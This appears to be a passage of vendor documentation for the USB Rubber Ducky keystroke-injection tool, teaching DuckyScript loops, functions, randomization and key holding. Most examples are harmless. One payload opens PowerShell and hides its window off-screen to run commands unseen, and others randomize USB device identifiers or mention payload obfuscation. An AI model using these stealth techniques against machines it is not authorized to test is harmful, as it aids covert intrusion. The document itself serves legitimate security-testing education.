This is loop that will execute endlessly, until intervention occurs. This may either come in the form of a button press, or simply by unplugging the USB Rubber Ducky.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#example-2)
REM Example Infinite Loop
BUTTON_DEF
WHILE TRUE
LED_R
DELAY 500
LED_OFF
DELAY 500
END_WHILE
END_BUTTON
WHILE TRUE
LED_G
DELAY 500
LED_OFF
DELAY 500
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#result-2)
* Because a button definition has been initiated with `BUTTON_DEF`, the default behavior will no longer apply when the button is pressed.
* The LED will blink green: half a second on, half a second off.
* Pressing the button will stop the currently infinite loop of blinking the LED green and execute the button definition, thus blinking the LED red.
* * *
[_navigate\_before_ Conditional Statements](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/)
[Functions _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/)
---
# Functions | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Functions
=========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#overview)
----------------------------------------------------------------------------------------------------------------------------
A function is a block of organized code that is used to perform a single task. Functions let you more efficiently run the same code multiple times without the need to copy and paste large blocks of code over and over again.
Functions make your payloads more modular and reusable, as each function may organize code that performs a single task.
FUNCTION [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#function)
----------------------------------------------------------------------------------------------------------------------------
The `FUNCTION` command defines the name of a function, and includes the function body — the block of code that will execute when the function is called. Defining a function with the `FUNCTION` command in of itself does not execute the code within. To execute the code block within a function, it is called using the name of the function. All functions are named ending in open and close parenthesis ("`()`").
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#syntax)
The `FUNCTION` command consists of these parts
* The `FUNCTION` keyword.
* The function name ending in open and close parenthesis ("`()`").
* One or more newlines containing the block of code to execute.
* One or more optional `RETURN` commands.
* The `END_FUNCTION` keyword.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#example)
REM Example Function
FUNCTION COUNTDOWN()
WHILE ($TIMER > 0)
STRING .
$TIMER = ($TIMER - 1)
DELAY 500
END_WHILE
END_FUNCTION
STRING And then it happened
VAR $TIMER = 3
COUNTDOWN()
SPACE
STRING a door opened to a world
$TIMER = 5
COUNTDOWN()
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#result)
* The `FUNCTION` command defines a new function named `COUNTDOWN()` containing a code block with a `WHILE` loop which types a single period ("`.`") for each value of `$TIMER`.
* The first time the `COUNTDOWN()` function is called, the $TIMER variable holds the value 3. The second time it is called, the $TIMER variable holds the value 5.
* The string “`And then it happened... a door opened to a world.....`” will be typed.
Passing Arguments [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#passing-arguments)
----------------------------------------------------------------------------------------------------------------------------------------------
Within DuckyScript 3.0, the scope of a variable are global to the payload. This means that any function may access any defined variable. Unlike programming languages with strict scoping, functions within DuckyScript do not require variables to be passed as arguments within the open and close parenthesis ("`()`").
In the example above, the `$TIMER` variable may be considered an argument as it is referenced within the function, however keep in mind that this variable may be used by any other function within the payload.
### Return Values [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#return-values)
A function may include a `RETURN` value, like a variable containing an integer or boolean. This allows the function as a whole to be evaluated similar to an expression.
REM Example FUNCTION with RETURN
ATTACKMODE HID
DELAY 2000
BUTTON_DEF
STRING !
END_BUTTON
FUNCTION TEST_BUTTON()
STRING Press the button within the next 5 seconds.
VAR $TIMER = 5
WHILE ($TIMER > 0)
STRING .
DELAY 1000
$TIMER = ($TIMER - 1)
END_WHILE
ENTER
IF ($_BUTTON_PUSH_RECEIVED == TRUE) THEN
RETURN TRUE
ELSE IF ($_BUTTON_PUSH_RECEIVED == FALSE) THEN
RETURN FALSE
END_IF
$_BUTTON_PUSH_RECEIVED = FALSE
END_FUNCTION
IF (TEST_BUTTON() == TRUE) THEN
STRINGLN The button was pressed!
ELSE
STRINGLN The button was not pressed!
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#result-1)
* When the `IF` statement on line 27 checks the condition of the function `TEST_BUTTON`, the function is called and executed.
* Based on whether or not the button is pressed, the `RETURN` value (lines 20 and 22) will be set to `TRUE` or `FALSE`.
* The IF statement on line 27 evaluates the `RETURN` of the function `TEST_BUTTON` and types the result accordingly.
Avoiding Errors [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#avoiding-errors)
------------------------------------------------------------------------------------------------------------------------------------------
* Function names should only contain letters, numbers and underscore ("`_`").
* Function names must end with open and close parenthesis ("`()`").
* They may begin with a letter or an underscore, but not a number.
* Spaces cannot be used in naming a function — however underscore makes for a suitable replacement. For example: `FUNCTION BLINK_LED()`.
* Be careful when using the uppercase letter `O` or lowercase letter `l` as they may be confused with the numbers `0` and `1`.
* Avoid using the names of commands or internal variables (e.g. `ATTACKMODE`, `STRING`, `WINDOWS`, `MAC`, `$_BUTTON_ENABLED`). See the full command and variable reference.
* * *
[_navigate\_before_ Loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/)
[Randomization _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/)
---
# ADVANCED FEATURES | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
ADVANCED FEATURES
=================
Advanced Features
* * *
---
# Randomization | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Randomization
=============
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#overview)
---------------------------------------------------------------------------------------------------------
DuckyScript 3.0 includes various randomization features, from random keystroke injection to random integers. This enables everything from payload obfuscation to unique values for device mass-enrollment, and even games!
### Pseudorandom [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#pseudorandom)
As an inherently deterministic device, USB Rubber Ducky pseudorandom number generator (PRNG) relies on an algorithm to generate a sequence of numbers which approximate the properties of random numbers. While the numbers generated by the USB Rubber Ducky are not truly random, they are sufficiently close to random allowing them to satisfy a great number of use cases.
### Seed [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#seed)
The seed is the number which initializes the pseudorandom number generator. From this number, all future random numbers are generated. On the USB Rubber Ducky, this number is stored in the file `seed.bin`, which resides on the root of the devices MicroSD card storage similar to the `inject.bin` file.
### Entropy [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#entropy)
The randomness used to automatically generate the seed considered entropy. A higher level of entropy results in a better quality seed. Entropy may be derived from human input or the USB Rubber Ducky hardware alone.
A high entropy `seed.bin` file may be generated using [Payload Studio](https://encoder.hak5.org/)
. Alternatively, if no seed is generated, a low entropy seed will be automatically generated by the USB Rubber Ducky in the case that one is necessary.
Random Keystroke Injection [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-keystroke-injection)
---------------------------------------------------------------------------------------------------------------------------------------------
Random keystroke injection is possible with DuckyScript 3.0. Using the appropriate random command, a random character may be typed.
| Command | Character Set |
| --- | --- |
| `RANDOM_LOWERCASE_LETTER` | abcdefghijklmnopqrstuvwxyz |
| `RANDOM_UPPERCASE_LETTER` | ABCDEFGHIJKLMNOPQRSTUVWXYZ |
| `RANDOM_LETTER` | abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ |
| `RANDOM_NUMBER` | 0123456789 |
| `RANDOM_SPECIAL` | !@#$%^&\*() |
| `RANDOM_CHAR` | abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789 !@#$%^&\*() |
info
Different key-maps will produce different characters on a keyboard. For example, with a US keyboard layout the key combo `SHIFT 3` will produce in a pound, hash or number sign ("`#`"). On a UK keyboard layout, the same key combo will produce the symbol for the pound sterling currency ("`£`").
For this reason, when [Payload Studio](https://encoder.hak5.org/)
compiles the DuckyScript payload into an `inject.bin` file, the selected language map will be packed into the payload such that the correct random keys are injected.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#example)
REM Example Random Keys
ATTACKMODE HID STORAGE
DELAY 2000
BUTTON_DEF
RANDOM_CHAR
END_BUTTON
STRINGLN Here are 10 random lowercase letters:
VAR $TIMES = 10
WHILE ($TIMES > 0)
RANDOM_LOWERCASE_LETTER
$TIMES = ($TIMES - 1)
END_WHILE
ENTER
ENTER
STRINGLN Here are 20 random numbers:
VAR $TIMES = 20
WHILE ($TIMES > 0)
RANDOM_NUMBER
$TIMES = ($TIMES - 1)
END_WHILE
ENTER
ENTER
STRINGLN Here are 3 random special characters:
RANDOM_SPECIAL
RANDOM_SPECIAL
RANDOM_SPECIAL
STRINGLN Press the button for a random character:
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#result)
* This payload will type:
* 10 random lowercase letters, per the while loop.
* 20 random numbers, per the while loop.
* 3 random special characters.
* The payload will then instruct the user to press the button.
* On each press of the button, the `BUTTON_DEF` will execute.
* This special functions contains the `RANDOM_CHARACTER` command, and thus a random character will be typed.
Random Integers [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-integers)
-----------------------------------------------------------------------------------------------------------------------
As opposed to the `RANDOM_NUMBER` command which will keystroke inject, or type a random digit, the internal variable `$_RANDOM_INT` may be referenced for a random integer.
| Internal Variable | Value |
| --- | --- |
| `$_RANDOM_INT` | Random integer within set range |
| `$_RANDOM_MIN` | Random integer minimum range (unsigned, 0-65535) |
| `$_RANDOM_MAX` | Random integer maximum range (unsigned, 0-65535) |
| `$_RANDOM_SEED` | Random seed from `seed.bin` |
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#example-1)
REM Example Random Integer
LED_OFF
VAR $A = $_RANDOM_INT
WHILE ($A > 0)
LED_G
DELAY 500
LED_OFF
DELAY 500
$A = ($A - 1)
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#result-1)
* Each time this payload is executed, the LED will randomly blink between 0 and 9 times.
### Minimum and maximum range [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#minimum-and-maximum-range)
Each time the `$_RANDOM_INT` variable is referenced, it will produce a random integer. By default, this integer will be between 0 and 9. The range in which the integer is produced may be specified by changing the values of `$_RANDOM_MIN` and `$_RANDOM_MAX`.
info
As unsigned integers, the minimum and maximum values must fall within the range of 0 through 65535.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#example-2)
REM Example Random Integer Example with Range
LED_OFF
$_RANDOM_MIN = 20
$_RANDOM_MAX = 50
VAR $A = $_RANDOM_INT
WHILE ($A > 0)
LED_G
DELAY 500
LED_OFF
DELAY 500
$A = ($A - 1)
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#result-2)
* Each time this payload is executed, the LED will blink a random number of times between 20 and 50.
info
The random minimum and maximum values may be changed arbitrarily as many times as needed throughout the payload.
Random and Conditional Statements [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-and-conditional-statements)
-----------------------------------------------------------------------------------------------------------------------------------------------------------
Random integers may be evaluated by conditional statement in the same way as ordinary variables.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#example-3)
REM Example Random Integer with Conditional Statement
ATTACKMODE HID STORAGE
DELAY 2000
$_RANDOM_MIN = 1
$_RANDOM_MAX = 1000
WHILE TRUE
VAR $A = $_RANDOM_INT
IF ($A >= 500) THEN
STRINGLN The random number is greater than or equal to 500
ELSE IF $(A < 500 THEN
STRINGLN The random number is less than 500
END_IF
STRINGLN Press the button to go again!
WAIT_FOR_BUTTON_PRESS
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#result-3)
* The random range, as defined by `$_RANDOM_MIN` and `$_RANDOM_MAX`, is initialized only once at the start of the payload.
* The remainder of the payload is carried out within the infinite loop, `WHILE TRUE`.
* Each time the loop begins the variable `$A` will assign a new random number from the internal variable `$_RANDOM_INT` between the range initially defined.
* The variable `$A` will be evaluated, and its condition (whether it’s greater or less than 500) will be typed.
* The loop will restart after the press of the button.
Random and ATTACKMODE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-and-attackmode)
-----------------------------------------------------------------------------------------------------------------------------------
In addition to random keystroke injection and integers, the USB Rubber Ducky can randomize a number of ATTACKMODE parameters.
| ATTACKMODE Parameter | Result |
| --- | --- |
| `VID_RANDOM` | Random Vendor ID |
| `PID_RANDOM` | Random Product ID |
| `MAN_RANDOM` | Random 32 alphanumeric character iManufacturer |
| `PROD_RANDOM` | Random 32 alphanumeric character iProduct |
| `SERIAL_RANDOM` | Random 12 digit serial number |
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#example-4)
REM Example Random ATTACKMODE Parameters
ATTACKMODE OFF
WHILE TRUE
ATTACKMODE HID VID_RANDOM PID_RANDOM MAN_RANDOM PROD_RANDOM SERIAL_RANDOM
LED_R
DELAY 2000
STRINGLN Hello, World!
WAIT_FOR_BUTTON_PRESS
LED_G
END_WHILE
info
Remember, `VID` and `PID` must be used as a pair and `MAN`, `PROD` and `SERIAL` must be used as a trio.
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#result-4)
* On each press of the button, the USB Rubber Ducky will re-enumerate as a new USB HID device with random VID, PID, MAN, PROD and SERIAL values.
* The string `Hello, World!` may be typed.
* Because `VID` and `PID` values may dictate device driver initialization, the USB Rubber Ducky may not be correctly enumerated as a Human Interface Device by the target OS.
report
Use caution when using random `VID` and `PID` values as unexpected results are likely.
Inspecting USB Device Enumeration [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#inspecting-usb-device-enumeration)
-----------------------------------------------------------------------------------------------------------------------------------------------------------
While performing security research with the USB Rubber Ducky, it is useful to inspect the USB device enumeration on the target operating system. These example commands and utilities are helpful in this regard.
### Linux [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#linux)
#### Terminal [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#terminal)
lsusb # and lsusb -v
# or
usb-devices
### macOS [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#macos)
#### Graphical Interface [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#graphical-interface)
1. Click the Apple icon
2. Click About This Mac
3. Click System Report
4. Click USB

System Report showing USB Keyboard on macOS
#### Terminal [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#terminal-1)
ioreg -p IOUSB
### Windows [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#windows)
#### Graphical Interface [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#graphical-interface-1)
[Microsoft USBView](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/usbview)
from the Windows SDK or the freeware [Nirsoft USBDeview](https://www.nirsoft.net/utils/usb_devices_view.html)
are graphical utilities for inspecting USB devices.

Nirsoft USBDeview
* [https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/usbview](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/usbview)
* [https://www.nirsoft.net/utils/usb\_devices\_view.html](https://www.nirsoft.net/utils/usb_devices_view.html)
#### **Powershell** [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#powershell)
gwmi Win32_USBControllerDevice
# or
Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Format-List
Random and Interaction [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-and-interaction)
-------------------------------------------------------------------------------------------------------------------------------------
The random functions can be used in combination with the interactive abilities of the USB Rubber Ducky in a number of ways. This example will illustrate some of the possibilities by demonstrating a simple dice roll guessing game.
REM Example Random Dice Roll Guessing Game
REM -------------------------------------------------------
REM Set the ATTACKMODE to both HID and STORAGE so it's easy
REM to change the payload without removing the MicroSD card
REM and give the computer 2 seconds to enumerate the Ducky!
REM -------------------------------------------------------
ATTACKMODE HID STORAGE
DELAY 2000
REM ------------------------------------------------------
REM Draw some Dice ASCII art because ASCII art is awesome!
REM Credit: valkyrie via asciiart.eu
REM ------------------------------------------------------
STRINGLN ____
STRINGLN /\' .\ _____
STRINGLN /: \___\ / . /\
STRINGLN \' / . / /____/..\
STRINGLN \/___/ \' '\ /
STRINGLN \'__'\/
STRINGLN Ducky Dice Roll!
ENTER
ENTER
REM ------------------------------------------------------------
REM Initialize the variables, including the random 6 sided dice.
REM ------------------------------------------------------------
$_RANDOM_MIN = 1
$_RANDOM_MAX = 6
VAR $GUESS = 0
VAR $TIMER = 0
REM -------------------------------------------------------------
REM Change the button timeout from its default 1000 ms to 100 ms.
REM -------------------------------------------------------------
$_BUTTON_TIMEOUT = 100
REM ----------------------------------------------------
REM Define the button such that on each press the guess
REM variable will increment by one and prevent the guess
REM from going over six.
REM ----------------------------------------------------
BUTTON_DEF
IF ($GUESS == 6) THEN
STRINGLN The guess cannot be greater than 6!
ELSE
$GUESS = ($GUESS + 1)
END_IF
END_BUTTON
REM -----------------------------
REM Begin the main infinite loop.
REM -----------------------------
WHILE TRUE
STRINGLN Rolling the dice...
DELAY 2000
REM -----------------------------------------
REM Assign the $DICE variable a random value.
REM -----------------------------------------
VAR $DICE = $_RANDOM_INT
STRINGLN Guess the value by pressing the button!
STRING You have 5 seconds to enter your guess
REM -----------------------------------------------
REM Give the player 5 seconds to enter their guess,
REM typing a period for each second that goes by.
REM -----------------------------------------------
$TIMER = 5
$GUESS = 0
WHILE ($TIMER > 0)
STRING .
DELAY 1000
$TIMER = ($TIMER - 1)
END_WHILE
REM ----------------------------------------------------
REM Draw ASCII art of the dice that was randomly chosen.
REM ----------------------------------------------------
ENTER
IF ($DICE == 1) THEN
STRINGLN -----
STRINGLN | |
STRINGLN | o |
STRINGLN | |
STRINGLN -----
ELSE IF ($DICE == 2) THEN
STRINGLN -----
STRINGLN |o |
STRINGLN | |
STRINGLN | o|
STRINGLN -----
ELSE IF ($DICE == 3) THEN
STRINGLN -----
STRINGLN |o |
STRINGLN | o |
STRINGLN | o|
STRINGLN -----
ELSE IF ($DICE == 4) THEN
STRINGLN -----
STRINGLN |o o|
STRINGLN | |
STRINGLN |o o|
STRINGLN -----
ELSE IF ($DICE == 5) THEN
STRINGLN -----
STRINGLN |o o|
STRINGLN | o |
STRINGLN |o o|
STRINGLN -----
ELSE IF ($DICE == 6) THEN
STRINGLN -----
STRINGLN |o o|
STRINGLN |o o|
STRINGLN |o o|
STRINGLN -----
END_IF
ENTER
REM --------------------------------------------
REM Remind the player which number they guessed.
REM --------------------------------------------
IF ($GUESS == 0) THEN
STRINGLN You did not guess!
ELSE IF ($GUESS == 1) THEN
STRINGLN You guessed 1
ELSE IF ($GUESS == 2) THEN
STRINGLN You guessed 2
ELSE IF ($GUESS == 3) THEN
STRINGLN You guessed 3
ELSE IF ($GUESS == 4) THEN
STRINGLN You guessed 4
ELSE IF ($GUESS == 5) THEN
STRINGLN You guessed 5
ELSE IF ($GUESS == 6) THEN
STRINGLN You guessed 6
END_IF
REM ---------------------------------------------------
REM Check to see if the guess and the dice are the same
REM and let the player know if they guessed correctly.
REM ---------------------------------------------------
IF ($DICE == $GUESS) THEN
STRINGLN You were correct!
ELSE
STRINGLN You were incorrect!
END_IF
REM -------------------------------------------------------
REM Invite the player to play again by pressing the button.
REM -------------------------------------------------------
STRINGLN Press the button to play again!
WAIT_FOR_BUTTON_PRESS
END_WHILE
Advanced Usage with INJECT\_VAR [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#advanced-usage-with-inject_var)
------------------------------------------------------------------------------------------------------------------------------------------------------
While calling `RANDOM_CHAR` will produce a random character, it will produce a different character **every time it is called**. In the event we would like to produce a random char once but inject it several times throughout our payload we will need to store this output in a variable; then we can use that variable with `INJECT_VAR` to inject it as many times as needed.
### Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#internal-variables)
warning
These internal variables **cannot** be assigned to. They are read only and thus cannot be on the left side of the `=` in an expression.
| Internal Variable | Description |
| --- | --- |
| `$_RANDOM_LOWER_LETTER_KEYCODE` | Returns random lower letter scancode (a-z) |
| `$_RANDOM_UPPER_LETTER_KEYCODE` | Returns random upper letter scancode (A-Z) |
| `$_RANDOM_LETTER_KEYCODE` | Returns random letter scancode (a-zA-Z) |
| `$_RANDOM_NUMBER_KEYCODE` | Returns random number scancode (0-9) |
| `$_RANDOM_SPECIAL_KEYCODE` | Returns random special char scancode(shift0-9) |
| `$_RANDOM_CHAR_KEYCODE` | Returns random letter number or special scancode |
### INJECT\_VAR [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#inject_var)
`INJECT_VAR` can be used to inject a variable.
warning
This requires the variable being passed to `INJECT_VAR` to hold a scancode.
#### Correct Usage [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#correct-usage)
Rem generate a random a-zA-Z keycode and store it in a variable
VAR $MY_RAND_KEY = $_RANDOM_LETTER_KEYCODE
INJECT_VAR $MY_RAND_KEY
INJECT_VAR $MY_RAND_KEY
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#result-5)
If, for example, the key generated by `$_RANDOM_LETTER_KEYCODE` happened to be `Z` the result of the injection would be
ZZ
#### Incorrect Usage [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#incorrect-usage)
report
`INJECT_VAR` does **not** automatically convert an integer into its corresponding character, the `TRANSLATE` extension is required for this!
The following code **will not function.** `$_RANDOM_INT` is a random integer, not a scancode of a number key.
VAR $MY_RAND_KEY = $_RANDOM_INT
INJECT_VAR $MY_RAND_KEY
To inject `$_RANDOM_INT` we would need to use the `TRANSLATE` extension to **convert** an integer into the decimal character representation.
This becomes easier to understand why when we consider the example value `1234`. While `1234` will fit into a single `VAR`, it is **4** keys to type the value out in decimal format. The integer value must be converted to decimal format, then converted from decimal format into the correct sequence of key presses in the correct keyboard language to type out the keys `1` `2` `3` `4`
* * *
[_navigate\_before_ Functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/)
[Holding Keys _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/)
---
# Holding Keys | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Holding Keys
============
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#overview)
--------------------------------------------------------------------------------------------------------
What happens when you hold down a key on a computer keyboard? To answer that, we must ask ourselves — what does it mean to hold a key? How does holding a key differ from pressing a key? In both cases, the key is both pressed and then subsequently released. The difference between pressing a key and holding a key is the time that goes by between pressing and releasing the key.
If you’re typing at 80 words per minute you’re making 400 keystrokes per minute, or nearly 7 keys per second. This equates to about 0.15 seconds, or 150 milliseconds, per key. Considering the key press, release and travel time between each key — one may approximate that roughly half, or about 75 ms, of that time to be the duration of a key press.
Obviously this will change dramatically depending on the human operating the keyboard — but suffice it to say that anything below 200 milliseconds may be considered a key press.
When processing the keystroke injection command `STRING Hello, World!` the USB Rubber Ducky interprets each key individually — communicating with the attached computer each respective key press HID code and key release HID code.
In the case of the first character of the `Hello, World!` string — the uppercase `H` — the process involves holding down the `SHIFT` modifier key, pressing the `h` key, releasing `h` key, then finally releasing `SHIFT`. Each of these are represented by a Human Interface Device (HID) code which is interpreted by the attached computer. All of this is being processed 60,000 times per second — which is what allows the USB Rubber Ducky to “type” at superhuman speeds.
What happens when a key, for example the letter `a` key, is held for a second? The answer is quite dependant on the operating system of the computer to which the USB Rubber Ducky is attached. On a modern Windows computer, a payload holding the letter `a` key for 1 seconds may result in `aaaaaaaaaaaaaaaaaaaaa` while the same payload may result in only `aaaaaaaaaa` on a similar computer running Linux. This can vary from computer to computer, as determined by each systems configured repeat delay and repeat rate.
This is to illustrate that the result of holding a key is very much dependent on the way the target computer is configured.

macOS accent menu
Further, the same payload holding the letter `a` key on a macOS target may result in the accent menu appearing rather than a sequence of `a` characters.
HOLD and RELEASE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#hold-and-release)
------------------------------------------------------------------------------------------------------------------------
The `HOLD` command will hold the specified key, while the `RELEASE` command will release it. Both commands require a key parameter.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#example)
REM Example HOLD and RELEASE
REM Target: Windows
ATTACKMODE HID STORAGE
DELAY 2000
REM Open Powershell
GUI r
DELAY 1000
STRING powershell
ENTER
REM Hide Powershell Window
DELAY 2000
ALT SPACE
DELAY 100
m
DELAY 100
HOLD DOWNARROW
DELAY 3000
RELEASE DOWNARROW
ENTER
REM Run desired commands in obfuscated powershell window
STRING tree c:\
ENTER
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#result)
* This example payload targets Windows systems.
* Using the `GUI r` key combo to open the Run dialog, a powershell window will be opened.
* The `ALT SPACE` key combo opens the window menu of the currently active window (in this case, the powershell window), followed by the `m` key to select the Move command.
* The `DOWNARROW` is held for 3 seconds, as specified by the `DELAY 3000` command, before being released — thus hiding the contents of the powershell window below the screen.
* The benign `tree c:\` command is run, producing a graphical directory structure of the disk.
Holding Modifier Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#holding-modifier-keys)
----------------------------------------------------------------------------------------------------------------------------------
Similar to how pressing a modifier key (`GUI`, `SHIFT`, `CONTROL` or `ALT`) requires the `INJECT_MOD` prefix, so too does holding a modifier key.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#example-1)
REM Example modifier key hold
ATTACKMODE HID STORAGE
DELAY 2000
INJECT_MOD
HOLD CONTROL
DELAY 4000
RELEASE CONTROL
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#result-1)
* The `CONTROL` key will be held for 4 seconds.
Holding Multiple Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#holding-multiple-keys)
----------------------------------------------------------------------------------------------------------------------------------
Multiple HOLD commands may be combined to hold more than one key simultaneously.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#example-2)
REM Example holding multiple keys
ATTACKMODE HID STORAGE
DELAY 2000
STRING iddqd
DELAY 500
WHILE TRUE
STRING idkfa
DELAY 500
HOLD LEFTARROW
HOLD UPARROW
INJECT_MOD
HOLD CONTROL
DELAY 5000
INJECT_MOD
RELEASE CONTROL
RELEASE UPARROW
RELEASE LEFTARROW
DELAY 500
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#result-2)
* Answering the age old question, “[will it run doom?](https://www.reddit.com/r/itrunsdoom/)
”, this payload proves the [1993 classic](https://en.wikipedia.org/wiki/Doom_%5C%281993_video_game%5C%29)
first-person shooter no match for the USB Rubber Ducky.
* More specifically, this payload will cause Doom Guy to walk in circles firing his weapon.
* * *
[_navigate\_before_ Randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/)
[Payload Control _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/)
---
# Jitter | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Jitter
======
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/#overview)
--------------------------------------------------------------------------------------------------
Jitter is a feature which varies the cadence, or delay, between individual key presses. When enabled, jitter affects all keystroke injection commands. Jitter delays are randomly generated at payload deployment, rather than statically compiled delays such as when using the `DELAY` command. This means that each deployment of a jitter-enabled payload will produce different results.
$\_JITTER\_ENABLED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/#_jitter_enabled)
-------------------------------------------------------------------------------------------------------------------
Jitter is enabled and disabled by changing the boolean value of the `$_JITTER_ENABLED` internal variable. By default the value of this variable is `FALSE`. To turn jitter on, set the variable to `TRUE`.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/#example)
REM Example Jitter
ATTACKMODE HID STORAGE
